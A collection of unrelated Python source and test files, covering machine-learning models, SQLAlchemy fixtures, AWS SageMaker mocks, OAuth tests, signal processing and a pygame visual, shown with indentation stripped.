predictors = ["Origin", "Dest", "Year", "UniqueCarrier", "DayOfWeek", "Month", "Distance", "FlightNum"]
response = "IsDepDelayed"
# split into train and validation sets
train, valid = airlines.split_frame(ratios = [.8], seed = 1234)
# initialize the estimator
model = H2OGradientBoostingEstimator(seed = 1234, ntrees=5)
# train the model
model.train(x=predictors, y=response, training_frame=train)
old_threshold = model._model_json['output']['default_threshold']
# predict
preds = model.predict(airlines)
# reset the threshold and get the old one
new_threshold = 0.6917189903082518
old_returned = reset_model_threshold(model, new_threshold)
reset_model = h2o.get_model(model.model_id)
reset_threshold = reset_model._model_json['output']['default_threshold']
# predict with reset model
preds_reset = reset_model.predict(airlines)
# compare thresholds
assert old_threshold == old_returned
assert new_threshold == reset_threshold
assert reset_threshold != old_threshold
# compare predictions
preds_local = preds.as_data_frame()
preds_reset_local = preds_reset.as_data_frame()
print("old threshold:", old_threshold, "new_threshold:", new_threshold)
for i in range(airlines.nrow):
if old_threshold <= preds_local.iloc[i, 2] < new_threshold:
assert preds_local.iloc[i, 0] != preds_reset_local.iloc[i, 0]
else:
assert preds_local.iloc[i, 0] == preds_reset_local.iloc[i, 0]
if __name__ == "__main__":
pyunit_utils.standalone_test(test_reset_threshold)
else:
test_reset_threshold()
|
22758
|
import pytest
import sqlalchemy as sa
class ThreeLevelDeepOneToOne(object):
@pytest.fixture
def Catalog(self, Base, Category):
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column('_id', sa.Integer, primary_key=True)
category = sa.orm.relationship(
Category,
uselist=False,
backref='catalog'
)
return Catalog
@pytest.fixture
def Category(self, Base, SubCategory):
class Category(Base):
__tablename__ = 'category'
id = sa.Column('_id', sa.Integer, primary_key=True)
catalog_id = sa.Column(
'_catalog_id',
sa.Integer,
sa.ForeignKey('catalog._id')
)
sub_category = sa.orm.relationship(
SubCategory,
uselist=False,
backref='category'
)
return Category
@pytest.fixture
def SubCategory(self, Base, Product):
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column('_id', sa.Integer, primary_key=True)
category_id = sa.Column(
'_category_id',
sa.Integer,
sa.ForeignKey('category._id')
)
product = sa.orm.relationship(
Product,
uselist=False,
backref='sub_category'
)
return SubCategory
@pytest.fixture
def Product(self, Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column('_id', sa.Integer, primary_key=True)
price = sa.Column(sa.Integer)
sub_category_id = sa.Column(
'_sub_category_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
)
return Product
@pytest.fixture
def init_models(self, Catalog, Category, SubCategory, Product):
pass
class ThreeLevelDeepOneToMany(object):
@pytest.fixture
def Catalog(self, Base, Category):
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column('_id', sa.Integer, primary_key=True)
categories = sa.orm.relationship(Category, backref='catalog')
return Catalog
@pytest.fixture
def Category(self, Base, SubCategory):
class Category(Base):
__tablename__ = 'category'
id = sa.Column('_id', sa.Integer, primary_key=True)
catalog_id = sa.Column(
'_catalog_id',
sa.Integer,
sa.ForeignKey('catalog._id')
)
sub_categories = sa.orm.relationship(
SubCategory, backref='category'
)
return Category
@pytest.fixture
def SubCategory(self, Base, Product):
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column('_id', sa.Integer, primary_key=True)
category_id = sa.Column(
'_category_id',
sa.Integer,
sa.ForeignKey('category._id')
)
products = sa.orm.relationship(
Product,
backref='sub_category'
)
return SubCategory
@pytest.fixture
def Product(self, Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column('_id', sa.Integer, primary_key=True)
price = sa.Column(sa.Numeric)
sub_category_id = sa.Column(
'_sub_category_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
)
def __repr__(self):
return '<Product id=%r>' % self.id
return Product
@pytest.fixture
def init_models(self, Catalog, Category, SubCategory, Product):
pass
class ThreeLevelDeepManyToMany(object):
@pytest.fixture
def Catalog(self, Base, Category):
catalog_category = sa.Table(
'catalog_category',
Base.metadata,
sa.Column('catalog_id', sa.Integer, sa.ForeignKey('catalog._id')),
sa.Column('category_id', sa.Integer, sa.ForeignKey('category._id'))
)
class Catalog(Base):
__tablename__ = 'catalog'
id = sa.Column('_id', sa.Integer, primary_key=True)
categories = sa.orm.relationship(
Category,
backref='catalogs',
secondary=catalog_category
)
return Catalog
@pytest.fixture
def Category(self, Base, SubCategory):
category_subcategory = sa.Table(
'category_subcategory',
Base.metadata,
sa.Column(
'category_id',
sa.Integer,
sa.ForeignKey('category._id')
),
sa.Column(
'subcategory_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
)
)
class Category(Base):
__tablename__ = 'category'
id = sa.Column('_id', sa.Integer, primary_key=True)
sub_categories = sa.orm.relationship(
SubCategory,
backref='categories',
secondary=category_subcategory
)
return Category
@pytest.fixture
def SubCategory(self, Base, Product):
subcategory_product = sa.Table(
'subcategory_product',
Base.metadata,
sa.Column(
'subcategory_id',
sa.Integer,
sa.ForeignKey('sub_category._id')
),
sa.Column(
'product_id',
sa.Integer,
sa.ForeignKey('product._id')
)
)
class SubCategory(Base):
__tablename__ = 'sub_category'
id = sa.Column('_id', sa.Integer, primary_key=True)
products = sa.orm.relationship(
Product,
backref='sub_categories',
secondary=subcategory_product
)
return SubCategory
@pytest.fixture
def Product(self, Base):
class Product(Base):
__tablename__ = 'product'
id = sa.Column('_id', sa.Integer, primary_key=True)
price = sa.Column(sa.Numeric)
return Product
@pytest.fixture
def init_models(self, Catalog, Category, SubCategory, Product):
pass
|
22777
|
from triage.experiments import ExperimentBase
class SingleThreadedExperiment(ExperimentBase):
def process_query_tasks(self, query_tasks):
self.feature_generator.process_table_tasks(query_tasks)
def process_matrix_build_tasks(self, matrix_build_tasks):
self.matrix_builder.build_all_matrices(matrix_build_tasks)
def process_train_test_batches(self, batches):
self.model_train_tester.process_all_batches(batches)
def process_subset_tasks(self, subset_tasks):
self.subsetter.process_all_tasks(subset_tasks)
|
22799
|
from .backend import Backend
from .circuitbyqiskit import CircuitByQiskit
from .circuitbyprojectq import CircuitByProjectq
from .circuitbycirq import CircuitByCirq
from .circuitbyqulacs import CircuitByQulacs
# from .circuitbytket import CircuitByTket
from .circuitbytensor import CircuitByTensor
from .circuitbyqton import CircuitByQton
import warnings
warnings.filterwarnings("ignore")
__all__ = [
'Backend',
'CircuitByCirq',
'CircuitByQiskit',
'CircuitByProjectq',
'CircuitByTensor',
'CircuitByQulacs',
'CircuitByQton'
]
|
22855
|
import os
import pygame
import random
trigger = False
x = 0
y = 0
height = 720
width = 1280
linelength = 50
lineAmt = 20
displace = 10
xpos = [random.randrange(-200,1280) for i in range(0, lineAmt + 2)]
xpos1 = [(xpos[i]+displace) for i in range(0, lineAmt + 2)]
xr = 360
yr = 240
def setup(screen, etc):
global trigger, x, y, height, width, xpos, lineAmt, xpos1, linelength, displace, xr, yr
xr = etc.xres
yr = etc.yres
height = yr
width = xr
linelength = ((50*xr)/1280)
lineAmt = ((20*xr)/1280)
displace = ((10*xr)/1280)
xpos = [random.randrange(int((-200*xr)/1280),xr) for i in range(0, lineAmt + 2)]
xpos1 = [(xpos[i]+displace) for i in range(0, lineAmt + 2)]
pass
def draw(screen, etc):
global trigger, x, y, height, width, xpos, lineAmt, xpos1, linelength, displace, xr, yr
etc.color_picker_bg(etc.knob5)
displace = ((10*xr)/1280)
linewidth = (height / lineAmt)
linelength = int(etc.knob2*((300*xr)/1280)+1)
color = etc.color_picker(etc.knob4)
minus = (etc.knob3*0.5)+0.5
shadowColor = (etc.bg_color[0]*minus, etc.bg_color[1]*minus, etc.bg_color[2]*minus)
if etc.audio_trig or etc.midi_note_new :
trigger = True
if trigger == True :
lineAmt = int(etc.knob1*((100*yr)/720) + 2)
xpos = [random.randrange(int((-200*xr)/1280),xr) for i in range(0, lineAmt + 2)]
xpos1 = [(xpos[i]+displace) for i in range(0, lineAmt + 2)]
for k in range(0, lineAmt + 2) :
x = xpos1[k] + linelength
y = (k * linewidth) + int(linewidth/2)- 1
pygame.draw.line(screen, shadowColor, (xpos1[k], y+displace), (x, y+displace), linewidth)
for j in range(0, lineAmt + 2) :
x = xpos[j] + linelength
y = (j * linewidth) + int(linewidth/2)- 1
pygame.draw.line(screen, color, (xpos[j], y), (x, y), linewidth)
trigger = False
|
22869
|
import tensorflow as tf
from tensorflow.contrib import slim
def head(endpoints, embedding_dim, is_training, weights_regularizer=None):
predict_var = 0
input = endpoints['model_output']
endpoints['head_output'] = slim.fully_connected(
input, 1024, normalizer_fn=slim.batch_norm,
normalizer_params={
'decay': 0.9,
'epsilon': 1e-5,
'scale': True,
'is_training': is_training,
'updates_collections': tf.GraphKeys.UPDATE_OPS,
},
weights_regularizer=weights_regularizer
)
input_1 = endpoints['head_output']
endpoints['emb_raw'] = slim.fully_connected(
input_1, embedding_dim + predict_var, activation_fn=None,weights_regularizer=weights_regularizer,
weights_initializer=tf.orthogonal_initializer(), scope='emb')
endpoints['emb'] = tf.nn.l2_normalize(endpoints['emb_raw'], -1)
# endpoints['data_sigma'] = None
print('Normalize batch embedding')
return endpoints
|
22870
|
from topbeat import BaseTest
import os
import shutil
import time
"""
Contains tests for base config
"""
class Test(BaseTest):
def test_invalid_config(self):
"""
Checks stop when input and topbeat defined
"""
shutil.copy("./config/topbeat-input-invalid.yml",
os.path.join(self.working_dir, "invalid.yml"))
exit_code = self.run_beat(config="invalid.yml", extra_args=["-N"])
assert exit_code == 1
assert self.log_contains(
"'topbeat' and 'input' are both set in config.") is True
def test_old_config(self):
"""
Test that old config still works with deprecation warning
"""
shutil.copy("./config/topbeat-old.yml",
os.path.join(self.working_dir, "topbeat-old.yml"))
topbeat = self.start_beat(config="topbeat-old.yml", extra_args=["-N"])
time.sleep(1)
topbeat.check_kill_and_wait()
assert self.log_contains(
"Using 'input' in configuration is deprecated and is scheduled to "
"be removed in Topbeat 6.0. Use 'topbeat' instead.") is True
|
22909
|
from __future__ import division
import numpy as np
__all__ = ['subtract_CAR',
'subtract_common_median_reference']
def subtract_CAR(X, b_size=16):
"""
Compute and subtract common average reference in 16 channel blocks.
"""
channels, time_points = X.shape
s = channels // b_size
r = channels % b_size
X_1 = X[:channels-r].copy()
X_1 = X_1.reshape((s, b_size, time_points))
X_1 -= np.nanmean(X_1, axis=1, keepdims=True)
if r > 0:
X_2 = X[channels-r:].copy()
X_2 -= np.nanmean(X_2, axis=0, keepdims=True)
X = np.vstack([X_1.reshape((s*b_size, time_points)), X_2])
return X
else:
return X_1.reshape((s*b_size, time_points))
def subtract_common_median_reference(X, channel_axis=-2):
"""
Compute and subtract common median reference
for the entire grid.
Parameters
----------
X : ndarray (..., n_channels, n_time)
Data to common median reference.
Returns
-------
Xp : ndarray (..., n_channels, n_time)
Common median referenced data.
"""
median = np.nanmedian(X, axis=channel_axis, keepdims=True)
Xp = X - median
return Xp
|
22916
|
from oauthlib.oauth2 import InvalidClientError, MissingTokenError
import pytest
from test import configure_mendeley, cassette
def test_should_get_authenticated_session():
mendeley = configure_mendeley()
auth = mendeley.start_client_credentials_flow()
with cassette('fixtures/auth/client_credentials/get_authenticated_session.yaml'):
session = auth.authenticate()
assert session.token['access_token']
assert session.host == 'https://api.mendeley.com'
def test_should_throw_exception_on_incorrect_credentials():
mendeley = configure_mendeley()
mendeley.client_secret += '-invalid'
auth = mendeley.start_client_credentials_flow()
# We should never get an access token back
# and the OAuth library should be unhappy about that
with cassette('fixtures/auth/client_credentials/incorrect_credentials.yaml'), pytest.raises(MissingTokenError):
auth.authenticate()
|
22973
|
import tensorflow as tf
"""Class for KDD10 percent GAN architecture.
Generator and discriminator.
"""
learning_rate = 0.00001
batch_size = 50
layer = 1
latent_dim = 32
dis_inter_layer_dim = 128
init_kernel = tf.contrib.layers.xavier_initializer()
def generator(z_inp, is_training=False, getter=None, reuse=False):
""" Generator architecture in tensorflow
Generates data from the latent space
Args:
z_inp (tensor): variable in the latent space
reuse (bool): sharing variables or not
Returns:
(tensor): last activation layer of the generator
"""
with tf.variable_scope('generator', reuse=reuse, custom_getter=getter):
name_net = 'layer_1'
with tf.variable_scope(name_net):
net = tf.layers.dense(z_inp,
units=64,
kernel_initializer=init_kernel,
name='fc')
net = tf.nn.relu(net, name='relu')
name_net = 'layer_2'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=128,
kernel_initializer=init_kernel,
name='fc')
net = tf.nn.relu(net, name='relu')
name_net = 'layer_4'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=121,
kernel_initializer=init_kernel,
name='fc')
return net
def discriminator(x_inp, is_training=False, getter=None, reuse=False):
""" Discriminator architecture in tensorflow
Discriminates between real data and generated data
Args:
x_inp (tensor): input data for the encoder.
reuse (bool): sharing variables or not
Returns:
logits (tensor): last activation layer of the discriminator (shape 1)
intermediate_layer (tensor): intermediate layer for feature matching
"""
with tf.variable_scope('discriminator', reuse=reuse, custom_getter=getter):
name_net = 'layer_1'
with tf.variable_scope(name_net):
net = tf.layers.dense(x_inp,
units=256,
kernel_initializer=init_kernel,
name='fc')
net = leakyReLu(net)
net = tf.layers.dropout(net, rate=0.2, name='dropout',
training=is_training)
name_net = 'layer_2'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=128,
kernel_initializer=init_kernel,
name='fc')
net = leakyReLu(net)
net = tf.layers.dropout(net, rate=0.2, name='dropout',
training=is_training)
name_net = 'layer_3'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=dis_inter_layer_dim,
kernel_initializer=init_kernel,
name='fc')
net = leakyReLu(net)
net = tf.layers.dropout(net,
rate=0.2,
name='dropout',
training=is_training)
intermediate_layer = net
name_net = 'layer_4'
with tf.variable_scope(name_net):
net = tf.layers.dense(net,
units=1,
kernel_initializer=init_kernel,
name='fc')
net = tf.squeeze(net)
return net, intermediate_layer
def leakyReLu(x, alpha=0.1, name=None):
if name:
with tf.variable_scope(name):
return _leakyReLu_impl(x, alpha)
else:
return _leakyReLu_impl(x, alpha)
def _leakyReLu_impl(x, alpha):
return tf.nn.relu(x) - (alpha * tf.nn.relu(-x))
|
23001
|
import math
import torch
import torch.nn as nn
from torch.nn import functional as F
class KLRegression(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density, mc_dim=-1):
"""Args:
scores: predicted score values
sample_density: probability density of the sample distribution
gt_density: probability density of the ground truth distribution
mc_dim: dimension of the MC samples"""
exp_val = scores - torch.log(sample_density + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim]) - \
torch.mean(scores * (gt_density / (sample_density + self.eps)), dim=mc_dim)
return L.mean()
class MLRegression(nn.Module):
"""Maximum likelihood loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density=None, mc_dim=-1):
"""Args:
scores: predicted score values. First sample must be ground-truth
sample_density: probability density of the sample distribution
gt_density: not used
mc_dim: dimension of the MC samples. Only mc_dim=1 supported"""
assert mc_dim == 1
assert (sample_density[:,0,...] == -1).all()
exp_val = scores[:, 1:, ...] - torch.log(sample_density[:, 1:, ...] + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim] - 1) - scores[:, 0, ...]
loss = L.mean()
return loss
class KLRegressionGrid(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using the grid integration strategy."""
def forward(self, scores, gt_density, grid_dim=-1, grid_scale=1.0):
"""Args:
scores: predicted score values
gt_density: probability density of the ground truth distribution
grid_dim: dimension(s) of the grid
grid_scale: area of one grid cell"""
score_corr = grid_scale * torch.sum(scores * gt_density, dim=grid_dim)
L = torch.logsumexp(scores, dim=grid_dim) + math.log(grid_scale) - score_corr
return L.mean()
|
23047
|
import boto3
from botocore.exceptions import ClientError
import datetime
import pytest
from moto import mock_sagemaker
from moto.sts.models import ACCOUNT_ID
FAKE_ROLE_ARN = "arn:aws:iam::{}:role/FakeRole".format(ACCOUNT_ID)
TEST_REGION_NAME = "us-east-1"
class MyProcessingJobModel(object):
def __init__(
self,
processing_job_name,
role_arn,
container=None,
bucket=None,
prefix=None,
app_specification=None,
network_config=None,
processing_inputs=None,
processing_output_config=None,
processing_resources=None,
stopping_condition=None,
):
self.processing_job_name = processing_job_name
self.role_arn = role_arn
self.container = (
container
or "683313688378.dkr.ecr.us-east-1.amazonaws.com/sagemaker-scikit-learn:0.23-1-cpu-py3"
)
self.bucket = bucket or "my-bucket"
self.prefix = prefix or "sagemaker"
self.app_specification = app_specification or {
"ImageUri": self.container,
"ContainerEntrypoint": ["python3",],
}
self.network_config = network_config or {
"EnableInterContainerTrafficEncryption": False,
"EnableNetworkIsolation": False,
}
self.processing_inputs = processing_inputs or [
{
"InputName": "input",
"AppManaged": False,
"S3Input": {
"S3Uri": "s3://{}/{}/processing/".format(self.bucket, self.prefix),
"LocalPath": "/opt/ml/processing/input",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
}
]
self.processing_output_config = processing_output_config or {
"Outputs": [
{
"OutputName": "output",
"S3Output": {
"S3Uri": "s3://{}/{}/processing/".format(
self.bucket, self.prefix
),
"LocalPath": "/opt/ml/processing/output",
"S3UploadMode": "EndOfJob",
},
"AppManaged": False,
}
]
}
self.processing_resources = processing_resources or {
"ClusterConfig": {
"InstanceCount": 1,
"InstanceType": "ml.m5.large",
"VolumeSizeInGB": 10,
},
}
self.stopping_condition = stopping_condition or {
"MaxRuntimeInSeconds": 3600,
}
def save(self):
sagemaker = boto3.client("sagemaker", region_name=TEST_REGION_NAME)
params = {
"AppSpecification": self.app_specification,
"NetworkConfig": self.network_config,
"ProcessingInputs": self.processing_inputs,
"ProcessingJobName": self.processing_job_name,
"ProcessingOutputConfig": self.processing_output_config,
"ProcessingResources": self.processing_resources,
"RoleArn": self.role_arn,
"StoppingCondition": self.stopping_condition,
}
return sagemaker.create_processing_job(**params)
@mock_sagemaker
def test_create_processing_job():
sagemaker = boto3.client("sagemaker", region_name=TEST_REGION_NAME)
processing_job_name = "MyProcessingJob"
role_arn = "arn:aws:iam::{}:role/FakeRole".format(ACCOUNT_ID)
container = "382416733822.dkr.ecr.us-east-1.amazonaws.com/linear-learner:1"
bucket = "my-bucket"
prefix = "my-prefix"
app_specification = {
"ImageUri": container,
"ContainerEntrypoint": ["python3", "app.py"],
}
processing_resources = {
"ClusterConfig": {
"InstanceCount": 2,
"InstanceType": "ml.m5.xlarge",
"VolumeSizeInGB": 20,
},
}
stopping_condition = {"MaxRuntimeInSeconds": 60 * 60}
job = MyProcessingJobModel(
processing_job_name,
role_arn,
container=container,
bucket=bucket,
prefix=prefix,
app_specification=app_specification,
processing_resources=processing_resources,
stopping_condition=stopping_condition,
)
resp = job.save()
resp["ProcessingJobArn"].should.match(
r"^arn:aws:sagemaker:.*:.*:processing-job/{}$".format(processing_job_name)
)
resp = sagemaker.describe_processing_job(ProcessingJobName=processing_job_name)
resp["ProcessingJobName"].should.equal(processing_job_name)
resp["ProcessingJobArn"].should.match(
r"^arn:aws:sagemaker:.*:.*:processing-job/{}$".format(processing_job_name)
)
assert "python3" in resp["AppSpecification"]["ContainerEntrypoint"]
assert "app.py" in resp["AppSpecification"]["ContainerEntrypoint"]
assert resp["RoleArn"] == role_arn
assert resp["ProcessingJobStatus"] == "Completed"
assert isinstance(resp["CreationTime"], datetime.datetime)
assert isinstance(resp["LastModifiedTime"], datetime.datetime)
@mock_sagemaker
def test_list_processing_jobs():
client = boto3.client("sagemaker", region_name="us-east-1")
name = "blah"
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar"
test_processing_job = MyProcessingJobModel(processing_job_name=name, role_arn=arn)
test_processing_job.save()
processing_jobs = client.list_processing_jobs()
assert len(processing_jobs["ProcessingJobSummaries"]).should.equal(1)
assert processing_jobs["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal(name)
assert processing_jobs["ProcessingJobSummaries"][0][
"ProcessingJobArn"
].should.match(r"^arn:aws:sagemaker:.*:.*:processing-job/{}$".format(name))
assert processing_jobs.get("NextToken") is None
@mock_sagemaker
def test_list_processing_jobs_multiple():
client = boto3.client("sagemaker", region_name="us-east-1")
name_job_1 = "blah"
arn_job_1 = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar"
test_processing_job_1 = MyProcessingJobModel(
processing_job_name=name_job_1, role_arn=arn_job_1
)
test_processing_job_1.save()
name_job_2 = "blah2"
arn_job_2 = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar2"
test_processing_job_2 = MyProcessingJobModel(
processing_job_name=name_job_2, role_arn=arn_job_2
)
test_processing_job_2.save()
processing_jobs_limit = client.list_processing_jobs(MaxResults=1)
assert len(processing_jobs_limit["ProcessingJobSummaries"]).should.equal(1)
processing_jobs = client.list_processing_jobs()
assert len(processing_jobs["ProcessingJobSummaries"]).should.equal(2)
assert processing_jobs.get("NextToken").should.be.none
@mock_sagemaker
def test_list_processing_jobs_none():
client = boto3.client("sagemaker", region_name="us-east-1")
processing_jobs = client.list_processing_jobs()
assert len(processing_jobs["ProcessingJobSummaries"]).should.equal(0)
@mock_sagemaker
def test_list_processing_jobs_should_validate_input():
client = boto3.client("sagemaker", region_name="us-east-1")
junk_status_equals = "blah"
with pytest.raises(ClientError) as ex:
client.list_processing_jobs(StatusEquals=junk_status_equals)
expected_error = f"1 validation errors detected: Value '{junk_status_equals}' at 'statusEquals' failed to satisfy constraint: Member must satisfy enum value set: ['Completed', 'Stopped', 'InProgress', 'Stopping', 'Failed']"
assert ex.value.response["Error"]["Code"] == "ValidationException"
assert ex.value.response["Error"]["Message"] == expected_error
junk_next_token = "<PASSWORD>"
with pytest.raises(ClientError) as ex:
client.list_processing_jobs(NextToken=junk_next_token)
assert ex.value.response["Error"]["Code"] == "ValidationException"
assert (
ex.value.response["Error"]["Message"]
== 'Invalid pagination token because "{0}".'
)
@mock_sagemaker
def test_list_processing_jobs_with_name_filters():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
for i in range(5):
name = "vgg-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/barfoo-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
xgboost_processing_jobs = client.list_processing_jobs(NameContains="xgboost")
assert len(xgboost_processing_jobs["ProcessingJobSummaries"]).should.equal(5)
processing_jobs_with_2 = client.list_processing_jobs(NameContains="2")
assert len(processing_jobs_with_2["ProcessingJobSummaries"]).should.equal(2)
@mock_sagemaker
def test_list_processing_jobs_paginated():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
xgboost_processing_job_1 = client.list_processing_jobs(
NameContains="xgboost", MaxResults=1
)
assert len(xgboost_processing_job_1["ProcessingJobSummaries"]).should.equal(1)
assert xgboost_processing_job_1["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal("xgboost-0")
assert xgboost_processing_job_1.get("NextToken").should_not.be.none
xgboost_processing_job_next = client.list_processing_jobs(
NameContains="xgboost",
MaxResults=1,
NextToken=xgboost_processing_job_1.get("NextToken"),
)
assert len(xgboost_processing_job_next["ProcessingJobSummaries"]).should.equal(1)
assert xgboost_processing_job_next["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal("xgboost-1")
assert xgboost_processing_job_next.get("NextToken").should_not.be.none
@mock_sagemaker
def test_list_processing_jobs_paginated_with_target_in_middle():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
for i in range(5):
name = "vgg-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/barfoo-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
vgg_processing_job_1 = client.list_processing_jobs(NameContains="vgg", MaxResults=1)
assert len(vgg_processing_job_1["ProcessingJobSummaries"]).should.equal(0)
assert vgg_processing_job_1.get("NextToken").should_not.be.none
vgg_processing_job_6 = client.list_processing_jobs(NameContains="vgg", MaxResults=6)
assert len(vgg_processing_job_6["ProcessingJobSummaries"]).should.equal(1)
assert vgg_processing_job_6["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal("vgg-0")
assert vgg_processing_job_6.get("NextToken").should_not.be.none
vgg_processing_job_10 = client.list_processing_jobs(
NameContains="vgg", MaxResults=10
)
assert len(vgg_processing_job_10["ProcessingJobSummaries"]).should.equal(5)
assert vgg_processing_job_10["ProcessingJobSummaries"][-1][
"ProcessingJobName"
].should.equal("vgg-4")
assert vgg_processing_job_10.get("NextToken").should.be.none
@mock_sagemaker
def test_list_processing_jobs_paginated_with_fragmented_targets():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
for i in range(5):
name = "vgg-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/barfoo-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
processing_jobs_with_2 = client.list_processing_jobs(NameContains="2", MaxResults=8)
assert len(processing_jobs_with_2["ProcessingJobSummaries"]).should.equal(2)
assert processing_jobs_with_2.get("NextToken").should_not.be.none
processing_jobs_with_2_next = client.list_processing_jobs(
NameContains="2",
MaxResults=1,
NextToken=processing_jobs_with_2.get("NextToken"),
)
assert len(processing_jobs_with_2_next["ProcessingJobSummaries"]).should.equal(0)
assert processing_jobs_with_2_next.get("NextToken").should_not.be.none
processing_jobs_with_2_next_next = client.list_processing_jobs(
NameContains="2",
MaxResults=1,
NextToken=processing_jobs_with_2_next.get("NextToken"),
)
assert len(processing_jobs_with_2_next_next["ProcessingJobSummaries"]).should.equal(
0
)
assert processing_jobs_with_2_next_next.get("NextToken").should.be.none
|
23057
|
import pytest
import datetime
import json
import functools
from urllib.parse import urlencode, parse_qs
from descarteslabs.common.graft import client as graft_client
from ... import types
from .. import tile_url
def test_url():
base = "foo"
base_q = base + "?"
url = functools.partial(tile_url.tile_url, base, types.Image.from_id(""))
assert url() == base
assert url(session_id="foo") == base_q + urlencode({"session_id": "foo"})
assert url(colormap="foo") == base_q + urlencode({"colormap": "foo"})
assert url(colormap="") == base_q + urlencode({"colormap": ""})
assert url(reduction="mean") == base_q + urlencode({"reduction": "mean"})
assert url(checkerboard=True) == base_q + urlencode({"checkerboard": "true"})
assert url(checkerboard=False) == base_q + urlencode({"checkerboard": "false"})
assert url(bands=["red"]) == base_q + urlencode({"band": "red"})
assert url(bands=["red", "green"]) == base_q + urlencode(
{"band": ["red", "green"]}, doseq=True
)
with pytest.raises(ValueError, match="Up to 3 bands may be specified, not 4"):
url(bands=["a", "b", "c", "d"])
# 1-band scales are normalized
assert url(scales=[0, 1]) == base_q + urlencode({"scales": "[[0.0, 1.0]]"})
# If all none scales, not included
assert url(scales=[None, None]) == base_q + urlencode({"scales": "null"})
# test everything gets added together correctly
got_base, params = url(
session_id="foo", colormap="bar", bands=["red", "green"]
).split("?")
assert got_base == base
query = parse_qs(params, strict_parsing=True, keep_blank_values=True)
assert query == {
# `parse_qs` returns all values wrapped in lists
"session_id": ["foo"],
"colormap": ["bar"],
"band": ["red", "green"],
}
@pytest.mark.parametrize(
"args",
[
{
"p1": "2021-01-20",
"p2": 2.2,
"p3": 1,
},
{
"p1": datetime.datetime(2020, 1, 20),
"p2": types.Float(1.1) + 1,
"p3": 1,
},
{
"p1": types.Datetime(2021, 1, 20),
"p2": types.Float(1.1) + 1,
"p3": types.Int(1),
},
],
)
def test_url_arguments(args):
func = types.Function[
dict(p1=types.Datetime, p2=types.Float, p3=types.Int), types.Image
]("x")
base = "http://base.net"
url = functools.partial(tile_url.tile_url, base, func)
with pytest.raises(TypeError, match="missing a required argument"):
url()
with pytest.raises(TypeError, match="got an unexpected keyword argument 'blah'"):
url(**args, blah="bad")
with graft_client.consistent_guid():
got_base, params = url(**args).split("?")
assert got_base == base
query = parse_qs(params, strict_parsing=True, keep_blank_values=True)
assert query.keys() == args.keys()
with graft_client.consistent_guid():
p1_graft = types.Datetime._promote(args["p1"]).graft
assert query["p1"] == [json.dumps(p1_graft)]
if isinstance(args["p2"], float):
assert query["p2"] == ["2.2"]
else:
assert query["p2"] == [json.dumps(args["p2"].graft)]
assert query["p3"] == ["1"]
def test_no_url_for_positional_only_function():
with pytest.raises(
TypeError, match="cannot use Functions with positional-only arguments"
):
tile_url.tile_url("", types.Function[types.Int, {}, types.Image]("x"))
def test_validate_scales():
assert tile_url.validate_scales([[0.0, 1.0], [0.0, 2.0], [-1.0, 1.0]]) == [
[0.0, 1.0],
[0.0, 2.0],
[-1.0, 1.0],
]
assert tile_url.validate_scales([[0.0, 1.0]]) == [[0.0, 1.0]]
# ints -> floats
assert tile_url.validate_scales([[0, 1]]) == [[0.0, 1.0]]
# 1-band convenience
assert tile_url.validate_scales([0, 1]) == [[0.0, 1.0]]
# no scalings
assert tile_url.validate_scales(None) == []
assert tile_url.validate_scales([]) == []
